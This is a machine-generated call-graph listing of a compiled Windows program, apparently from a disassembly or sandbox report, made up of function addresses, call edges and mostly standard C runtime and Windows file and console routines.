LeaveCriticalSection 14392->14830 14394 1f9155 14394->14371 14425 1feac2 14395->14425 14397 1fea8a 14397->14383 14398 1fea28 14398->14397 14399 1fed36 __strnicoll 15 API calls 14398->14399 14400 1fea81 14399->14400 14401 1fe38b ___free_lconv_mon 14 API calls 14400->14401 14401->14397 14448 1f7ea3 14402->14448 14405 1f7f8f 14407 1f7f84 14405->14407 14413 1f7e02 66 API calls 14405->14413 14414 1f8183 14405->14414 14454 1f7ba0 14405->14454 14460 1f81f1 14405->14460 14463 1f8269 14405->14463 14503 1f83c2 14405->14503 14406 1f7f67 14408 1fa742 __fread_nolock 29 API calls 14406->14408 14418 1f7c71 14407->14418 14408->14407 14413->14405 14415 1fa742 __fread_nolock 29 API calls 14414->14415 14416 1f819d 14415->14416 14417 1fa742 __fread_nolock 29 API calls 14416->14417 14417->14407 14419 1fe38b ___free_lconv_mon 14 API calls 14418->14419 14420 1f7c81 14419->14420 14421 1feb00 14420->14421 14422 1feb0b 14421->14422 14423 1f8b7a 14421->14423 14422->14423 14730 1fe7d5 14422->14730 14423->14390 14426 1feace 14425->14426 14427 1feaf8 14426->14427 14432 1fff08 14426->14432 14427->14398 14429 1feae9 14439 204b34 14429->14439 14431 1feaef 14431->14398 14433 1fff29 14432->14433 14434 1fff14 14432->14434 14433->14429 14435 1feb3e __dosmaperr 14 API calls 14434->14435 14436 1fff19 14435->14436 14437 1fa599 __fread_nolock 29 API calls 14436->14437 14438 1fff24 14437->14438 14438->14429 14440 204b41 14439->14440 14441 204b4e 14439->14441 14442 1feb3e __dosmaperr 14 API calls 14440->14442 14444 204b5a 14441->14444 14445 1feb3e __dosmaperr 14 API calls 14441->14445 14443 204b46 14442->14443 14443->14431 14444->14431 14446 204b7b 14445->14446 14447 1fa599 __fread_nolock 29 API calls 14446->14447 14447->14443 14449 1f7eae 14448->14449 14450 1f7ed0 14448->14450 14452 1fa742 __fread_nolock 29 API calls 14449->14452 14538 1f7a0c 14450->14538 14453 1f7ec9 14452->14453 14453->14405 14453->14406 14453->14407 14455 1f7bb0 14454->14455 14546 1ff0b0 14455->14546 14554 1f91bc 14460->14554 14462 1f822c 14462->14405 14464 1f8287 14463->14464 14465 1f8270 14463->14465 14468 1fa742 __fread_nolock 29 API calls 14464->14468 14474 1f82c6 14464->14474 14466 1f83e6 14465->14466 14467 1f8452 14465->14467 14465->14474 14470 1f83ec 14466->14470 14471 1f847a 14466->14471 14472 1f8457 14467->14472 14473 1f8491 14467->14473 14469 1f82bb 14468->14469 14469->14405 14484 1f83f1 14470->14484 14485 1f8447 14470->14485 14602 1f8f90 14471->14602 14475 1f8459 14472->14475 14476 1f8488 14472->14476 14477 1f8496 14473->14477 14478 1f84b0 14473->14478 14474->14405 14482 1f8400 14475->14482 14490 1f8468 14475->14490 14609 1f89ff 14476->14609 14477->14471 14477->14485 14488 1f8419 14477->14488 14613 1f8a1c 14478->14613 14487 1f84bb 14482->14487 14577 1f886e 14482->14577 14484->14482 14486 1f842c 14484->14486 14484->14488 14485->14487 14591 1f8c76 14485->14591 14486->14487 14587 1f8704 14486->14587 14493 1f4de3 CatchGuardHandler 5 API calls 14487->14493 14488->14487 14499 1f85bc 14488->14499 14616 1f7edb 14488->14616 14490->14471 14492 1f846c 14490->14492 14492->14487 14598 1f8a32 14492->14598 14495 1f8702 14493->14495 14495->14405 14497 1f7edb 66 API calls 14497->14499 14499->14497 14500 1f862f 14499->14500 14502 1f8694 14500->14502 14620 1ffc6b 14500->14620 14501 1f7edb 66 API calls 14501->14502 14502->14487 14502->14501 14504 1f83e6 14503->14504 14505 1f8452 14503->14505 14506 1f83ec 14504->14506 14507 1f847a 14504->14507 14508 1f8457 14505->14508 14509 1f8491 14505->14509 14519 1f83f1 14506->14519 14520 1f8447 14506->14520 14515 1f8f90 30 API calls 14507->14515 14510 1f8459 14508->14510 14511 1f8488 14508->14511 14512 1f8496 14509->14512 14513 1f84b0 14509->14513 14517 1f8400 14510->14517 14523 1f8468 14510->14523 14516 1f89ff 30 API calls 14511->14516 14512->14507 14512->14520 14529 1f8419 14512->14529 14514 1f8a1c 30 API calls 14513->14514 14514->14529 14515->14529 14516->14529 14518 1f886e 42 API calls 14517->14518 14532 1f84bb 14517->14532 14518->14529 14519->14517 14521 1f842c 14519->14521 14519->14529 14522 1f8c76 30 API calls 14520->14522 14520->14532 14524 1f8704 41 API calls 14521->14524 14521->14532 14522->14529 14523->14507 14525 1f846c 14523->14525 14524->14529 14527 1f8a32 29 API calls 14525->14527 14525->14532 14526 1f4de3 CatchGuardHandler 5 API calls 14528 1f8702 14526->14528 14527->14529 14528->14405 14530 1f7edb 66 API calls 14529->14530 14529->14532 14534 1f85bc 14529->14534 14530->14529 14531 1f7edb 66 API calls 14531->14534 14532->14526 14533 1ffc6b 41 API calls 14535 1f862f 14533->14535 14534->14531 14534->14535 14535->14533 14537 1f8694 14535->14537 14536 1f7edb 66 API calls 14536->14537 14537->14532 14537->14536 14539 1f7a20 14538->14539 14545 1f7a8a 14538->14545 14540 1fff08 __fread_nolock 29 API calls 14539->14540 14541 1f7a27 14540->14541 14542 1feb3e __dosmaperr 14 API calls 14541->14542 14541->14545 14543 1f7a7f 14542->14543 14544 1fa599 __fread_nolock 29 API calls 14543->14544 14544->14545 14545->14453 14547 1f7bcd 14546->14547 14548 1ff0c7 14546->14548 14550 1ff0e1 14547->14550 14548->14547 14549 2006e6 __strnicoll 39 API calls 14548->14549 14549->14547 14551 1f7bda 14550->14551 14552 1ff0f8 14550->14552 14551->14405 14552->14551 14553 1fdb22 __strnicoll 39 API calls 14552->14553 14553->14551 14564 1f9178 14554->14564 14556 1f91fe 14556->14462 14557 1f91ce 14557->14556 14558 1f91e3 14557->14558 14561 1f9216 14557->14561 14559 1fa742 __fread_nolock 29 API calls 14558->14559 14559->14556 14560 1f92ad 14562 1f9193 29 API calls 14560->14562 14561->14560 14571 1f9193 14561->14571 14562->14556 14565 1f917d 14564->14565 14566 1f9190 14564->14566 14567 1feb3e __dosmaperr 14 API calls 14565->14567 14566->14557 14568 1f9182 14567->14568 14569 1fa599 __fread_nolock 29 API calls 14568->14569 14570 1f918d 14569->14570 14570->14557 14572 1f91b8 14571->14572 14573 1f91a4 14571->14573 14572->14560 14573->14572 14574 1feb3e __dosmaperr 14 API calls 14573->14574 14575 1f91ad 14574->14575 14576 1fa599 __fread_nolock 29 API calls 14575->14576 14576->14572 14578 1f8888 14577->14578 14630 1f8b8e 14578->14630 14580 1f88c7 14641 1ff174 14580->14641 14583 1f7ba0 __wsopen_s 39 API calls 14584 1f897e 14583->14584 14585 1f7ba0 __wsopen_s 39 API calls 14584->14585 14586 1f89b1 14584->14586 14585->14586 14586->14488 14588 1f871f 14587->14588 14589 1f8755 14588->14589 14590 1ffc6b 41 API calls 14588->14590 14589->14488 14590->14589 14592 1f8c8b 14591->14592 14593 1f8cad 14592->14593 14595 1f8cd4 14592->14595 14594 1fa742 __fread_nolock 29 API calls 14593->14594 14597 1f8cca 14594->14597 14596 1f8b8e 15 API calls 14595->14596 14595->14597 14596->14597 14597->14488 14601 1f8a48 14598->14601 14599 1fa742 __fread_nolock 29 API calls 14600 1f8a69 14599->14600 14600->14488 14601->14599 14601->14600 14604 1f8fa5 14602->14604 14603 1f8fee 14607 1f8b8e 15 API calls 14603->14607 14608 1f8fe4 14603->14608 14604->14603 14605 1f8fc7 14604->14605 14606 1fa742 __fread_nolock 29 API calls 14605->14606 14606->14608 14607->14608 14608->14488 14610 1f8a0b 14609->14610 14705 1f8e03 14610->14705 14612 1f8a1b 14612->14488 14614 1f8c76 30 API calls 14613->14614 14615 1f8a31 14614->14615 14615->14488 14617 1f7eed 14616->14617 14619 1f7ef5 14617->14619 14712 1fae0b 14617->14712 14619->14488 14621 1ffc80 14620->14621 14622 1ffcc1 14621->14622 14624 1f7ba0 __wsopen_s 39 API calls 14621->14624 14627 1ffc84 __fread_nolock 14621->14627 14629 1ffcad __fread_nolock 14621->14629 14625 20177f __wsopen_s WideCharToMultiByte 14622->14625 14622->14627 14622->14629 14623 1fa742 __fread_nolock 29 API calls 14623->14627 14624->14622 14626 1ffd7c 14625->14626 14626->14627 14628 1ffd92 GetLastError 14626->14628 14627->14500 14628->14627 14628->14629 14629->14623 14629->14627 14631 1f8bb5 14630->14631 14632 1f8ba3 14630->14632 14631->14632 14633 1fed36 __strnicoll 15 API calls 14631->14633 14632->14580 14634 1f8bd9 14633->14634 14635 1f8bec 14634->14635 14636 1f8be1 14634->14636 14660 1f7c4d 14635->14660 14637 1fe38b ___free_lconv_mon 14 API calls 14636->14637 14637->14632 14640 1fe38b ___free_lconv_mon 14 API calls 14640->14632 14642 1ff1a9 14641->14642 14643 1ff185 14641->14643 14642->14643 14645 1ff1dc 14642->14645 14644 1fa742 __fread_nolock 29 API calls 14643->14644 14655 1f895a 14644->14655 14646 1ff215 14645->14646 14648 1ff244 14645->14648 14663 1ff329 14646->14663 14647 1ff26d 14652 1ff29a 14647->14652 14653 1ff2d4 14647->14653 14648->14647 14649 1ff272 14648->14649 14671 1ff6eb 14649->14671 14656 1ff29f 14652->14656 14657 1ff2ba 14652->14657 14698 1ff511 14653->14698 14655->14583 14655->14584 14681 1ffb9c 14656->14681 14691 1ffb06 14657->14691 14661 1fe38b ___free_lconv_mon 14 API calls 14660->14661 14662 1f7c5c 14661->14662 14662->14640 14664 1ff33f 14663->14664 14665 1ff34a 14663->14665 14664->14655 14666 1fca8c ___std_exception_copy 29 API calls 14665->14666 14668 1ff3a5 14666->14668 14667 1ff3af 14667->14655 14668->14667 14669 1fa5c6 std::_Throw_Cpp_error 11 API calls 14668->14669 14670 1ff3bd 14669->14670 14672 1ff6fe 14671->14672 14673 1ff72f 14672->14673 14674 1ff70d 14672->14674 14676 1ff744 14673->14676 14678 1ff797 14673->14678 14675 1fa742 __fread_nolock 29 API calls 14674->14675 14680 1ff725 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 14675->14680 14677 1ff511 41 API calls 14676->14677 14677->14680 14679 1f7ba0 __wsopen_s 39 API calls 14678->14679 14678->14680 14679->14680 14680->14655 14682 204e72 31 API calls 14681->14682 14683 1ffbcc 14682->14683 14684 204cc7 29 API calls 14683->14684 14685 1ffc0a 14684->14685 14686 1ffc4a 14685->14686 14688 1ffc23 14685->14688 14689 1ffc11 14685->14689 14687 1ff3be 41 API calls 14686->14687 14687->14689 14688->14688 14690 1ffa18 39 API calls 14688->14690 14689->14655 14690->14689 14692 204e72 31 API calls 14691->14692 14693 1ffb35 14692->14693 14694 204cc7 29 API calls 14693->14694 14695 1ffb76 14694->14695 14696 1ffb7d 14695->14696 14697 1ffa18 39 API calls 14695->14697 14696->14655 14697->14696 14699 204e72 31 API calls 14698->14699 14700 1ff53b 14699->14700 14701 204cc7 29 API calls 14700->14701 14702 1ff589 14701->14702 14703 1ff3be 41 API calls 14702->14703 14704 1ff590 14702->14704 14703->14704 14704->14655 14706 1f8e18 14705->14706 14707 1f8e3a 14706->14707 14709 1f8e61 14706->14709 14708 1fa742 __fread_nolock 29 API calls 14707->14708 14711 1f8e57 14708->14711 14710 1f8b8e 15 API calls 14709->14710 14709->14711 14710->14711 14711->14612 14713 1fae2a 14712->14713 14714 1fae19 14712->14714 14713->14619 14717 20285c 14714->14717 14716 1fae25 14716->14619 14718 2028ec 14717->14718 14719 1fff08 __fread_nolock 29 API calls 14718->14719 14721 2028f9 14719->14721 14720 202905 14720->14716 14721->14720 14722 202951 14721->14722 14723 202867 31 API calls 14721->14723 14722->14720 14724 2029b3 14722->14724 14725 1feac2 29 API calls 14722->14725 14723->14722 14726 2029e2 64 API calls 14724->14726 14727 2029a6 14725->14727 14728 2029c4 14726->14728 14727->14724 14729 2082bb __fread_nolock 14 API calls 14727->14729 14728->14716 14729->14724 14731 1fe7ee 14730->14731 14735 1fe815 14730->14735 14732 1fff08 __fread_nolock 29 API calls 14731->14732 14731->14735 14733 1fe80a 14732->14733 14736 204281 14733->14736 14735->14423 14738 20428d ___scrt_is_nonwritable_in_current_image 14736->14738 14737 204295 14737->14735 14738->14737 14739 2042ce 14738->14739 14741 204314 14738->14741 14740 1fa742 __fread_nolock 29 API calls 14739->14740 14740->14737 14747 2020ca EnterCriticalSection 14741->14747 14743 20431a 14746 204338 14743->14746 14748 204065 14743->14748 14776 20438a 14746->14776 14747->14743 14749 20408d 14748->14749 14752 2040b0 __wsopen_s 14748->14752 14750 204091 14749->14750 14753 2040ec 14749->14753 14751 1fa742 __fread_nolock 29 API calls 14750->14751 14751->14752 14752->14746 14754 20410a 14753->14754 14793 20364e 14753->14793 14779 204392 14754->14779 14758 204122 14760 204151 14758->14760 14761 20412a 14758->14761 14759 204169 14762 2041d2 WriteFile 14759->14762 14763 20417d 14759->14763 14801 20440f GetConsoleOutputCP 14760->14801 14761->14752 14796 2047d6 14761->14796 14765 2041f4 GetLastError 14762->14765 14774 204164 14762->14774 14766 204185 14763->14766 14767 2041be 14763->14767 14765->14774 14770 2041aa 14766->14770 14771 20418a 14766->14771 14786 20483e 14767->14786 14821 204a02 14770->14821 14771->14752 14773 204193 14771->14773 14774->14752 14829 2020ed LeaveCriticalSection 14776->14829 14778 204390 14778->14737 14780 204b34 __fread_nolock 29 API calls 14779->14780 14783 2043a4 14780->14783 14781 20411c 14781->14758 14781->14759 14782 2043d2 14782->14781 14785 2043ec GetConsoleMode 14782->14785 14783->14781 14783->14782 14784 1f7ba0 __wsopen_s 39 API calls 14783->14784 14784->14782 14785->14781 14791 20484d __wsopen_s 14786->14791 14794 2037af __fread_nolock 31 API calls 14793->14794 14795 203667 14794->14795 14795->14754 14799 20482d 14796->14799 14800 2047f8 14796->14800 14797 208370 5 API calls __wsopen_s 14797->14800 14798 20482f GetLastError 14798->14799 14799->14752 14800->14797 14800->14798 14800->14799 14802 204481 14801->14802 14811 204488 CatchIt 14801->14811 14803 1f7ba0 __wsopen_s 39 API calls 14802->14803 14803->14811 14806 1ffdd5 40 API calls __wsopen_s 14806->14811 14807 20473e 14811->14806 14811->14807 14829->14778 14830->14394 14832 1cf417 _strlen 14831->14832 14833 1cfc52 14832->14833 14834 1d6fc0 std::_Throw_Cpp_error 29 API calls 14832->14834 14838 1c5e50 31 API calls 14832->14838 14839 1d9f40 14832->14839 14835 1f4de3 CatchGuardHandler 5 API calls 14833->14835 14834->14832 14836 1d0340 FreeConsole 14835->14836 14836->14334 14838->14832 14840 1da0e8 CatchIt 14839->14840 14841 1da74c 14840->14841 14845 1db6d0 14840->14845 14842 1f4de3 CatchGuardHandler 5 API calls 14841->14842 14844 1db6b6 14842->14844 14844->14832 14852 1dbc9f _Deallocate CatchIt 14845->14852 14846 1defca 14850 1f4de3 CatchGuardHandler 5 API calls 14846->14850 14847 1dfaf0 5 API calls std::_Throw_Cpp_error 14847->14852 14848 1defc5 14873 1deff0 14848->14873 14851 1defd9 14850->14851 14851->14840 14852->14846 14852->14847 14852->14848 14854 1ddadb 14852->14854 14858 1e1be0 14852->14858 14862 1e3820 14852->14862 14877 1fa5a9 14854->14877 14859 1e1eb5 14858->14859 14860 1f4de3 CatchGuardHandler 5 API calls 14859->14860 14861 1e3813 14860->14861 14861->14852 14863 1e3871 14862->14863 14864 1e3bc7 14863->14864 14866 1e425a 14863->14866 14867 1f4d76 8 API calls std::_Throw_Cpp_error 14863->14867 14869 1e4296 14863->14869 14865 1f4de3 CatchGuardHandler 5 API calls 14864->14865 14868 1e448e 14865->14868 14882 1e44b0 14866->14882 14867->14863 14868->14852 14871 1fa5a9 std::_Throw_Cpp_error 29 API calls 14869->14871 14872 1e44a4 14871->14872 14874 1df6c1 14873->14874 14899 1f54b2 14874->14899 14878 1fa7e8 __fread_nolock 29 API calls 14877->14878 14879 1fa5b8 14878->14879 14880 1fa5c6 std::_Throw_Cpp_error 11 API calls 14879->14880 14881 1fa5c5 14880->14881 14887 1f664c 14882->14887 14884 1e44d7 14890 1f6c3d 14884->14890 14888 1f6666 14887->14888 14889 1f6693 RaiseException 14887->14889 14888->14889 14889->14884 14891 1e4508 14890->14891 14892 1f6c4a ___std_exception_copy 14890->14892 14891->14869 14892->14891 14893 1f6c77 14892->14893 14895 1fca8c ___std_exception_copy 29 API calls 14892->14895 14896 1fb14c 14893->14896 14895->14893 14897 1fe38b ___free_lconv_mon 14 API calls 14896->14897 14898 1fb164 14897->14898 14898->14891 14906 1f54fb 14899->14906 14902 1f664c CallUnexpected RaiseException 14903 1f54d1 14902->14903 14909 1e4560 14903->14909 14912 1f4df1 14906->14912 14910 1f6c3d ___std_exception_copy 29 API calls 14909->14910 14911 1dfaea 14910->14911 14913 1f6c3d ___std_exception_copy 29 API calls 14912->14913 14914 1f4e1d 14913->14914 14914->14902 14917 1fb3ec ___scrt_is_nonwritable_in_current_image 14915->14917 14916 1fb3f2 14918 1fa742 __fread_nolock 29 API calls 14916->14918 14917->14916 14920 1fb435 14917->14920 14919 1fb40d 14918->14919 14919->14338 14926 1f774f EnterCriticalSection 14920->14926 14922 1fb441 14927 1fb2f4 14922->14927 14924 1fb457 14938 1fb480 14924->14938 14926->14922 14928 1fb31a 14927->14928 14929 1fb307 14927->14929 14941 1fb21b 14928->14941 14929->14924 14931 1fb33d 14932 1fb3cb 14931->14932 14933 1fb358 14931->14933 14945 1fb4ba 14931->14945 14932->14924 14935 1fe7d5 ___scrt_uninitialize_crt 64 API calls 14933->14935 14936 1fb36b 14935->14936 14937 20364e __wsopen_s 31 API calls 14936->14937 14937->14932 15020 1f7763 LeaveCriticalSection 14938->15020 14940 1fb488 14940->14919 14942 1fb22c 14941->14942 14944 1fb284 14941->14944 14942->14944 14959 20360e 14942->14959 14944->14931 14946 1fb88c 14945->14946 14947 1fb89b 14946->14947 14948 1fb8c3 14946->14948 14949 1fa742 __fread_nolock 29 API calls 14947->14949 14950 1fff08 __fread_nolock 29 API calls 14948->14950 14958 1fb8b6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14949->14958 14951 1fb8cc 14950->14951 14982 20366c 14951->14982 14954 1fb976 14985 1fb516 14954->14985 14956 1fb98d 14956->14958 14997 1fb6c1 14956->14997 14958->14933 14960 203622 __fread_nolock 14959->14960 14963 2037af 14960->14963 14962 203637 __fread_nolock 14962->14944 14969 201cdc 14963->14969 14965 2037c1 14966 2037dd SetFilePointerEx 14965->14966 14968 2037c9 __wsopen_s 14965->14968 14967 2037f5 GetLastError 14966->14967 14966->14968 14967->14968 14968->14962 14970 201ce9 14969->14970 14971 201cfe 14969->14971 14972 1feb51 __dosmaperr 14 API calls 14970->14972 14974 1feb51 __dosmaperr 14 API calls 14971->14974 14976 201d23 14971->14976 14973 201cee 14972->14973 14975 1feb3e __dosmaperr 14 API calls 14973->14975 14977 201d2e 14974->14977 14978 201cf6 14975->14978 14976->14965 14979 1feb3e __dosmaperr 14 API calls 14977->14979 14978->14965 14980 201d36 14979->14980 14981 1fa599 __fread_nolock 29 API calls 14980->14981 14981->14978 15004 20368a 14982->15004 14986 1fb525 __wsopen_s 14985->14986 14987 1fff08 __fread_nolock 29 API calls 14986->14987 14988 1fb541 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14987->14988 14990 20366c 33 API calls 14988->14990 14996 1fb54d 14988->14996 14989 1f4de3 CatchGuardHandler 5 API calls 14991 1fb6bf 14989->14991 14992 1fb5a1 14990->14992 14991->14958 14993 1fb5d3 ReadFile 14992->14993 14992->14996 14994 1fb5fa 14993->14994 14993->14996 14995 20366c 33 API calls 14994->14995 14995->14996 14996->14989 14998 1fff08 __fread_nolock 29 API calls 14997->14998 14999 1fb6d4 14998->14999 15000 20366c 33 API calls 14999->15000 15003 1fb71e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14999->15003 15001 1fb77b 15000->15001 15002 20366c 33 API calls 15001->15002 15001->15003 15002->15003 15003->14958 15007 203696 ___scrt_is_nonwritable_in_current_image 15004->15007 15005 1fb8ea 15005->14954 15005->14956 15005->14958 15006 2036d9 15008 1fa742 __fread_nolock 29 API calls 15006->15008 15007->15005 15007->15006 15009 20371f 15007->15009 15008->15005 15015 2020ca EnterCriticalSection 15009->15015 15011 203725 15012 203746 15011->15012 15013 2037af __fread_nolock 31 API calls 15011->15013 15016 2037a7 15012->15016 15013->15012 15015->15011 15019 2020ed LeaveCriticalSection 15016->15019 15018 2037ad 15018->15005 15019->15018 15020->14940 15022 1fba6b ___scrt_is_nonwritable_in_current_image 15021->15022 15023 1fba93 15022->15023 15024 1fba72 15022->15024 15032 1f774f EnterCriticalSection 15023->15032 15025 1fa742 __fread_nolock 29 API calls 15024->15025 15029 1fba8b 15025->15029 15027 1fba9e 15033 1fba2d 15027->15033 15029->14342 15032->15027 15039 1fb88c 15033->15039 15035 1fba3f 15036 1fbad5 15035->15036 15053 1f7763 LeaveCriticalSection 15036->15053 15038 1fbadd 15038->15029 15040 1fb89b 15039->15040 15041 1fb8c3 15039->15041 15042 1fa742 __fread_nolock 29 API calls 15040->15042 15043 1fff08 __fread_nolock 29 API calls 15041->15043 15044 1fb8b6 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15042->15044 15045 1fb8cc 15043->15045 15044->15035 15046 20366c 33 API calls 15045->15046 15047 1fb8ea 15046->15047 15047->15044 15048 1fb976 15047->15048 15049 1fb98d 15047->15049 15050 1fb516 34 API calls 15048->15050 15049->15044 15052 1fb6c1 33 API calls 15049->15052 15051 1fb985 15050->15051 15051->15044 15052->15044 15053->15038 15055 1faec5 ___scrt_is_nonwritable_in_current_image 15054->15055 15056 1faf0f 15055->15056 15058 1faed8 __fread_nolock 15055->15058 15066 1faefd 15055->15066 15067 1f774f EnterCriticalSection 15056->15067 15060 1feb3e __dosmaperr 14 API calls 15058->15060 15059 1faf19 15068 1faf73 15059->15068 15062 1faef2 15060->15062 15064 1fa599 __fread_nolock 29 API calls 15062->15064 15064->15066 15066->13283 15067->15059 15069 1faf30 15068->15069 15072 1faf85 __fread_nolock 15068->15072 15082 1faf4e 15069->15082 15070 1faf92 15071 1feb3e __dosmaperr 14 API calls 15070->15071 15080 1faf97 15071->15080 15072->15069 15072->15070 15074 1fafe3 15072->15074 15073 1fa599 __fread_nolock 29 API calls 15073->15069 15074->15069 15076 1fae38 __fread_nolock 29 API calls 15074->15076 15077 1fff08 __fread_nolock 29 API calls 15074->15077 15079 1fb10e __fread_nolock 15074->15079 15085 202bcd 15074->15085 15150 203434 15074->15150 15076->15074 15077->15074 15078 1feb3e __dosmaperr 14 API calls 15078->15080 15079->15078 15080->15073 15236 1f7763 LeaveCriticalSection 15082->15236 15084 1faf54 15084->15066 15086 202bf7 15085->15086 15087 202bdf 15085->15087 15089 202f39 15086->15089 15092 202c3a 15086->15092 15088 1feb51 __dosmaperr 14 API calls 15087->15088 15090 202be4 15088->15090 15091 1feb51 __dosmaperr 14 API calls 15089->15091 15093 1feb3e __dosmaperr 14 API calls 15090->15093 15094 202f3e 15091->15094 15095 202c45 15092->15095 15096 202bec 15092->15096 15103 202c75 15092->15103 15093->15096 15097 1feb3e __dosmaperr 14 API calls 15094->15097 15098 1feb51 __dosmaperr 14 API calls 15095->15098 15096->15074 15099 202c52 15097->15099 15100 202c4a 15098->15100 15101 1fa599 __fread_nolock 29 API calls 15099->15101 15102 1feb3e __dosmaperr 14 API calls 15100->15102 15101->15096 15102->15099 15104 202c8e 15103->15104 15105 202cc9 15103->15105 15106 202c9b 15103->15106 15104->15106 15139 202cb7 15104->15139 15108 1fed36 __strnicoll 15 API calls 15105->15108 15107 1feb51 __dosmaperr 14 API calls 15106->15107 15109 202ca0 15107->15109 15112 202cda 15108->15112 15110 1feb3e __dosmaperr 14 API calls 15109->15110 15113 202ca7 15110->15113 15111 204b34 __fread_nolock 29 API calls 15114 202e15 15111->15114 15115 1fe38b ___free_lconv_mon 14 API calls 15112->15115 15116 1fa599 __fread_nolock 29 API calls 15113->15116 15117 202e89 15114->15117 15120 202e2e GetConsoleMode 15114->15120 15118 202ce3 15115->15118 15148 202cb2 __fread_nolock 15116->15148 15119 202e8d ReadFile 15117->15119 15121 1fe38b ___free_lconv_mon 14 API calls 15118->15121 15122 202f01 GetLastError 15119->15122 15123 202ea5 15119->15123 15120->15117 15124 202e3f 15120->15124 15125 202cea 15121->15125 15126 202e65 15122->15126 15127 202f0e 15122->15127 15123->15122 15128 202e7e 15123->15128 15124->15119 15129 202e45 ReadConsoleW 15124->15129 15130 202cf4 15125->15130 15131 202d0f 15125->15131 15140 1feb64 __dosmaperr 14 API calls 15126->15140 15126->15148 15133 1feb3e __dosmaperr 14 API calls 15127->15133 15143 202ee1 15128->15143 15144 202eca 15128->15144 15128->15148 15129->15128 15135 202e5f GetLastError 15129->15135 15132 1feb3e __dosmaperr 14 API calls 15130->15132 15134 20360e __fread_nolock 31 API calls 15131->15134 15137 202cf9 15132->15137 15138 202f13 15133->15138 15134->15139 15135->15126 15136 1fe38b ___free_lconv_mon 14 API calls 15136->15096 15141 1feb51 __dosmaperr 14 API calls 15137->15141 15142 1feb51 __dosmaperr 14 API calls 15138->15142 15139->15111 15140->15148 15141->15148 15142->15148 15146 202efa 15143->15146 15143->15148 15171 202fd6 15144->15171 15184 20327a 15146->15184 15148->15136 15151 20343f 15150->15151 15152 20344c 15151->15152 15156 203464 15151->15156 15153 1feb3e __dosmaperr 14 API calls 15152->15153 15154 203451 15153->15154 15155 1fa599 __fread_nolock 29 API calls 15154->15155 15157 20345c 15155->15157 15156->15157 15158 2034c3 15156->15158 15226 2082bb 15156->15226 15157->15074 15160 1fff08 __fread_nolock 29 API calls 15158->15160 15161 2034dc 15160->15161 15196 202ab4 15161->15196 15164 1fff08 __fread_nolock 29 API calls 15165 203515 15164->15165 15165->15157 15166 1fff08 __fread_nolock 29 API calls 15165->15166 15167 203523 15166->15167 15167->15157 15168 1fff08 __fread_nolock 29 API calls 15167->15168 15169 203531 15168->15169 15170 1fff08 __fread_nolock 29 API calls 15169->15170 15170->15157 15190 20312d 15171->15190 15173 20035b __strnicoll MultiByteToWideChar 15174 2030ea 15173->15174 15178 2030f3 GetLastError 15174->15178 15181 20301e 15174->15181 15175 203078 15182 203032 15175->15182 15183 20360e __fread_nolock 31 API calls 15175->15183 15176 203068 15179 1feb3e __dosmaperr 14 API calls 15176->15179 15180 1feb64 __dosmaperr 14 API calls 15178->15180 15179->15181 15180->15181 15181->15148 15182->15173 15183->15182 15185 2032b4 15184->15185 15186 20334a ReadFile 15185->15186 15187 202eff 15185->15187 15186->15187 15188 203367 15186->15188 15187->15148 15188->15187 15189 20360e __fread_nolock 31 API calls 15188->15189 15189->15187 15191 203161 15190->15191 15192 2031d2 ReadFile 15191->15192 15195 202fed 15191->15195 15193 2031eb 15192->15193 15192->15195 15194 20360e __fread_nolock 31 API calls 15193->15194 15193->15195 15194->15195 15195->15175 15195->15176 15195->15181 15195->15182 15197 202ac0 ___scrt_is_nonwritable_in_current_image 15196->15197 15198 202ac8 15197->15198 15201 202ae3 15197->15201 15199 1feb51 __dosmaperr 14 API calls 15198->15199 15200 202acd 15199->15200 15203 1feb3e __dosmaperr 14 API calls 15200->15203 15202 202afa 15201->15202 15205 202b35 15201->15205 15204 1feb51 __dosmaperr 14 API calls 15202->15204 15225 202ad5 15203->15225 15206 202aff 15204->15206 15207 202b53 15205->15207 15208 202b3e 15205->15208 15210 1feb3e __dosmaperr 14 API calls 15206->15210 15231 2020ca EnterCriticalSection 15207->15231 15211 1feb51 __dosmaperr 14 API calls 15208->15211 15216 202b07 15210->15216 15213 202b43 15211->15213 15212 202b59 15214 202b78 15212->15214 15215 202b8d 15212->15215 15217 1feb3e __dosmaperr 14 API calls 15213->15217 15218 1feb3e __dosmaperr 14 API calls 15214->15218 15220 202bcd __fread_nolock 41 API calls 15215->15220 15219 1fa599 __fread_nolock 29 API calls 15216->15219 15217->15216 15221 202b7d 15218->15221 15219->15225 15222 202b88 15220->15222 15223 1feb51 __dosmaperr 14 API calls 15221->15223 15232 202bc5 15222->15232 15223->15222 15225->15157 15225->15164 15227 1febee __dosmaperr 14 API calls 15226->15227 15228 2082d8 15227->15228 15229 1fe38b ___free_lconv_mon 14 API calls 15228->15229 15230 2082e2 15229->15230 15230->15158 15231->15212 15235 2020ed LeaveCriticalSection 15232->15235 15234 202bcb 15234->15225 15235->15234 15236->15084 15238 1e5c94 CatchIt 15237->15238 15239 1e6ed4 15238->15239 15241 1e6ecf 15238->15241 15243 1e6f20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15238->15243 15247 1e3820 31 API calls std::_Throw_Cpp_error 15238->15247 15248 1e5eeb 15238->15248 15262 1e7ef0 15239->15262 15259 1e6f10 15241->15259 15243->15238 15245 1f4de3 CatchGuardHandler 5 API calls 15246 1e6ef8 15245->15246 15246->14352 15247->15238 15249 1e44b0 std::_Throw_Cpp_error 30 API calls 15248->15249 15250 1e6f09 15249->15250 15253 1e5328 15251->15253 15255 1e532d _Deallocate 15251->15255 15252 1f4de3 CatchGuardHandler 5 API calls 15254 1e559c 15252->15254 15253->15252 15254->14350 15255->15253 15256 1e5432 15255->15256 15257 1fa5a9 std::_Throw_Cpp_error 29 API calls 15256->15257 15258 1e55a9 15257->15258 15260 1f54b2 std::_Xinvalid_argument 30 API calls 15259->15260 15261 1e6f1a 15260->15261 15266 1e7f33 _Deallocate 15262->15266 15263 1e81c4 15264 1f4de3 CatchGuardHandler 5 API calls 15263->15264 15265 1e6ee9 15264->15265 15265->15245 15266->15263 15267 1e8017 15266->15267 15268 1fa5a9 std::_Throw_Cpp_error 29 API calls 15267->15268 15269 1e81f6 15268->15269 15271 1f9887 